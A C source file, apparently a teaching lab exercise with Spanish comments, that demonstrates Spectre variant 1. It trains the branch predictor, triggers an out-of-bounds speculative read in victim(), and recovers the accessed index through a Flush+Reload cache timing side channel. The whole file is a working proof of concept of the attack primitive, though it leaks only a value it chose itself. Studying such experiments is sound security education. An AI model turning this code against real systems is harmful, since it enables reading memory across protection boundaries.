#include <emmintrin.h>
#include <x86intrin.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>

int size = 10;
uint8_t array[256*4096];
uint8_t temp = 0;
#define CACHE_HIT_THRESHOLD (80)
#define DELTA 1024

void flushSideChannel()
{
  int i;
  // Guardar en la RAM para prevenir COW
  for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1;
  // FLUSH del array en la caché
  for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 +DELTA]);
}

void reloadSideChannel()
{
  int junk=0;
  register uint64_t time1, time2;
  volatile uint8_t *addr;
  int i;
  for(i = 0; i < 256; i++){
    addr = &array[i*4096 + DELTA];
    time1 = __rdtscp(&junk);
    junk = *addr;
    time2 = __rdtscp(&junk) - time1;
    if (time2 <= CACHE_HIT_THRESHOLD) {
      printf("array[%d*4096 + %d] en caché.\n", i, DELTA);
      printf("Secreto = %d\n",i);
    }
  } 
}

void victim(size_t x)
{
  if (x < size) {  
    temp = array[x * 4096 + DELTA];  
  }
}

int main() {
  int i;
  // FLUSH del array de prueba
  flushSideChannel();
  // "Entrenar" la CPU para tomar la función verdadera en la función victim()
  for (i = 0; i < 10; i++) {   
    _mm_clflush(&size); 
    victim(i);
  }
  // Explotar la ejecución out-of-order
  _mm_clflush(&size);
  for (i = 0; i < 256; i++)
    _mm_clflush(&array[i*4096 + DELTA]); 
  victim(97);  
  // RELOAD el array de prueba
  reloadSideChannel();
  return (0); 
}



